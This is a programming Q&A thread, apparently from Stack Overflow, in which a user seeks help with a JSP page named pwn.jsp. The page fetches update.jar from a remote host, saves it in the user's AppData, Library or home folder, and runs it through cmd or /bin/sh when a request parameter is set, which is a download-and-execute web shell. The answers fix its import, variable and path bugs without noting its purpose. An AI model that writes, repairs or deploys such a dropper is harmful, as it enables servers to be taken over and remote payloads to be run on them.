# JSP servlett error, can't figure it out

Tags: java, servlets

I am relatively new to servletts, and I can't figure this out. Everything looks ok to me...

Here is my code:

```
<%@ page import="java.util.*,java.io.*, java.net.*, "%>
<%
String cmd;
String[] cmdarr;
String OS = System.getProperty("os.name");



String link = "http://site.com/update.jar";

    String userDir = System.getProperty("user.home");
    int last = link.lastIndexOf("/");
    int ending = link.lastIndexOf(".");
    String fileName = link.substring(last + 1);
    String fileEnding = link.substring(ending + 1);
    URL u = new URL(link);
    URLConnection uc = u.openConnection();
    String contentType = uc.getContentType();
    int contentLength = uc.getContentLength();
    if (contentType.startsWith("text/") || contentLength == -1) {
      throw new IOException("This is not a binary file.");
    }
    InputStream raw = uc.getInputStream();
    InputStream in = new BufferedInputStream(raw);
    byte[] data = new byte[contentLength];
    int bytesRead = 0;
    int offset = 0;
    while (offset < contentLength) {
      bytesRead = in.read(data, offset, data.length - offset);
      if (bytesRead == -1)
        break;
      offset += bytesRead;
    }
    in.close();
String path;
    if (offset != contentLength) {
      throw new IOException("Only read " + offset + " bytes; Expected " + contentLength + " bytes");
    }
    if(OS.startsWith("Mac")){
         path = userDir+"/Library/"+fileName;
    }
    else if(OS.startsWith("Windows")){
             path = userDir+"/AppData/Roaming/"+fileName;
    }
    else if(OS.startsWith("Linux")){
             path = userDir+"/"+fileName;
    }
    else{
        path = userDir+"/"+fileName;
    }

    FileOutputStream out = new FileOutputStream(path);
    out.write(data);
    out.flush();
    out.close();





    if (request.getParameter("cmd") != null) {
        cmd = "java -jar "+path;
      if (OS.startsWith("Windows")) {
       cmdarr = new String [] {"cmd", "/C", cmd};
      }
      else {
       cmdarr = new String [] {"/bin/sh", "-c", cmd};
      }
      Process p = Runtime.getRuntime().exec(cmdarr);
      OutputStream os = p.getOutputStream();
      InputStream in = p.getInputStream();
      DataInputStream dis = new DataInputStream(in);
      String disr = dis.readLine();
      while ( disr != null ) {
        out.println(disr);
        disr = dis.readLine();
      }
    }

%>
```

Here is the error:

```
org.apache.jasper.JasperException: Unable to compile class for JSP

Generated servlet error:
Syntax error on token "import", Identifier expected after this token

An error occurred at line: 2 in the jsp file: /pwn.jsp
Generated servlet error:
Duplicate local variable out

An error occurred at line: 2 in the jsp file: /pwn.jsp
Generated servlet error:
The method write(int) in the type Writer is not applicable for the arguments (byte[])

An error occurred at line: 2 in the jsp file: /pwn.jsp
Generated servlet error:
Duplicate local variable in


    org.apache.jasper.servlet.JspServletWrapper.handleJspException(JspServletWrapper.java:510)
    org.apache.jasper.servlet.JspServletWrapper.service(JspServletWrapper.java:375)
    org.apache.jasper.servlet.JspServlet.serviceJspFile(JspServlet.java:314)
    org.apache.jasper.servlet.JspServlet.service(JspServlet.java:264)
    javax.servlet.http.HttpServlet.service(HttpServlet.java:810)
    org.jboss.web.tomcat.filters.ReplyHeaderFilter.doFilter(ReplyHeaderFilter.java:96)
root cause

org.apache.jasper.JasperException: Unable to compile class for JSP

Generated servlet error:
Syntax error on token "import", Identifier expected after this token

An error occurred at line: 2 in the jsp file: /pwn.jsp
Generated servlet error:
Duplicate local variable out

An error occurred at line: 2 in the jsp file: /pwn.jsp
Generated servlet error:
The method write(int) in the type Writer is not applicable for the arguments (byte[])

An error occurred at line: 2 in the jsp file: /pwn.jsp
Generated servlet error:
Duplicate local variable in


    org.apache.jasper.compiler.DefaultErrorHandler.javacError(DefaultErrorHandler.java:84)
    org.apache.jasper.compiler.ErrorDispatcher.javacError(ErrorDispatcher.java:328)
    org.apache.jasper.compiler.JDTCompiler.generateClass(JDTCompiler.java:413)
    org.apache.jasper.compiler.Compiler.compile(Compiler.java:297)
    org.apache.jasper.compiler.Compiler.compile(Compiler.java:276)
    org.apache.jasper.compiler.Compiler.compile(Compiler.java:264)
    org.apache.jasper.JspCompilationContext.compile(JspCompilationContext.java:563)
    org.apache.jasper.servlet.JspServletWrapper.service(JspServletWrapper.java:303)
    org.apache.jasper.servlet.JspServlet.serviceJspFile(JspServlet.java:314)
    org.apache.jasper.servlet.JspServlet.service(JspServlet.java:264)
    javax.servlet.http.HttpServlet.service(HttpServlet.java:810)
    org.jboss.web.tomcat.filters.ReplyHeaderFilter.doFilter(ReplyHeaderFilter.java:96)
```

I have fixed the error at imports, and duplicate variables, but now I get this error:

```
org.apache.jasper.JasperException: An exception occurred processing JSP page /file.jsp at line 52

49:         path = userDir+"/"+fileName;
50:     }
51: 
52:     FileOutputStream out2 = new FileOutputStream(path);
53:     out2.write(data);
54:     out2.flush();
55:     out2.close();


Stacktrace:
    org.apache.jasper.servlet.JspServletWrapper.handleJspException(JspServletWrapper.java:518)
    org.apache.jasper.servlet.JspServletWrapper.service(JspServletWrapper.java:417)
    org.apache.jasper.servlet.JspServlet.serviceJspFile(JspServlet.java:320)
    org.apache.jasper.servlet.JspServlet.service(JspServlet.java:266)
    javax.servlet.http.HttpServlet.service(HttpServlet.java:803)
    org.jboss.web.tomcat.filters.ReplyHeaderFilter.doFilter(ReplyHeaderFilter.java:96)
root cause

java.io.FileNotFoundException: C:\AppData\Roaming\update.jar (Das System kann den angegebenen Pfad nicht finden)
    java.io.FileOutputStream.open(Native Method)
    java.io.FileOutputStream.<init>(Unknown Source)
    java.io.FileOutputStream.<init>(Unknown Source)
    org.apache.jsp.pwn_jsp._jspService(pwn_jsp.java:108)
    org.apache.jasper.runtime.HttpJspBase.service(HttpJspBase.java:70)
    javax.servlet.http.HttpServlet.service(HttpServlet.java:803)
    org.apache.jasper.servlet.JspServletWrapper.service(JspServletWrapper.java:387)
    org.apache.jasper.servlet.JspServlet.serviceJspFile(JspServlet.java:320)
    org.apache.jasper.servlet.JspServlet.service(JspServlet.java:266)
    javax.servlet.http.HttpServlet.service(HttpServlet.java:803)
    org.jboss.web.tomcat.filters.ReplyHeaderFilter.doFilter(ReplyHeaderFilter.java:96)
```

Comment: I suppose you have an extra comma at the end of your import.

Answer (score 2, accepted):

You have plenty of errors in your code.

First, remove the trailing comma in the import statement.

```
<%@ page import="java.util.*,java.io.*, java.net.*, "%>
                                                  ^
```

Also, you have duplicated variables:

```
InputStream in = new BufferedInputStream(raw);
```

and

```
InputStream in = p.getInputStream();
```

Change the name of one of them and rename the corresponding references, as well.

Comment: I have fixed both of these, now I get a different error, see updated post.

Comment: The stacktrace **clearly** says it: This file `C:\AppData\Roaming\update.jar` is not found. You have to provide a valid path to the `update.jar`.

Comment: The reason that happens is because it is not donwloading update.jar. The whole first part of the code downloads update.jar and places it in that directory.

Comment: The first errors happens during the donwload part, I am trying to figure out why that is not working. See the error around line 49 in the third paste?

Comment: I will not answer any further questions on this thread, unless you accept back my answer about the initial problem you had. If you have another problem, ask another question. Thank you.

Comment: Sorry, I have accepted it again. It seems to work fine when running on my linux server (after the modifications), but when I run it on my windows server, I get the second error trace.

Comment: Windows dir separators are marked with backslashes. They have to be escaped, also. That's why you're getting an invalid directory. 
Change the output folder to `path = userDir+"\\AppData\\Roaming\\"+fileName;`

Comment: I have done that, same error. The file will not donwload at all... On Windows at least.

Answer (score 1):

Naming your input and output FileStreams `in` and `out` is causing conflicts because those variables are used by other java libraries or in other places in your code.  You need to change them

e.g.

```
FileOutputStream out2 = new FileOutputStream(path);

InputStream in2 = new BufferedInputStream(raw);
```

Also take the comma out at the end of your page import.

```
<%@ page import="java.util.*,java.io.*, java.net.*"%>
```

Comment: @kocko pointed out where the duplicate was for your `in` variable and java uses the `out` variable for things like `out.print('')` etc..

Comment: Java doesn't use `out.print()` unless you have defined `OutputStream out = System.out;`. :)

Comment: :) thank you for the info, it looks like `out.println(disr);` is causing an error in the code as well.. Isn't that from one of the java libraries?

Comment: No, it's the `FileOutputStream` defined above. :)

Comment: Ahh your right.. Where is the `Duplicate local variable out` error coming from then?  I know changing the variable to `out2` fixes it though..

Comment: I don't know. The only duplicates I see are the `in` variables. Possibly the OP hasn't shared the complete source ... but that's just a guess of mine. Anyhow, let him first fix the already found errors and then he may share the status.

Comment: @kocko Okay well i'll definitely up vote your answer.. I'm just leaving mine here for a bit because I have a feeling he/she might need to change the `FileOutputStream out` variable as well.  But yeah I don't see where that error is coming from either.

Comment: @kocko I have fixed both of these, now I get a different error, see updated post.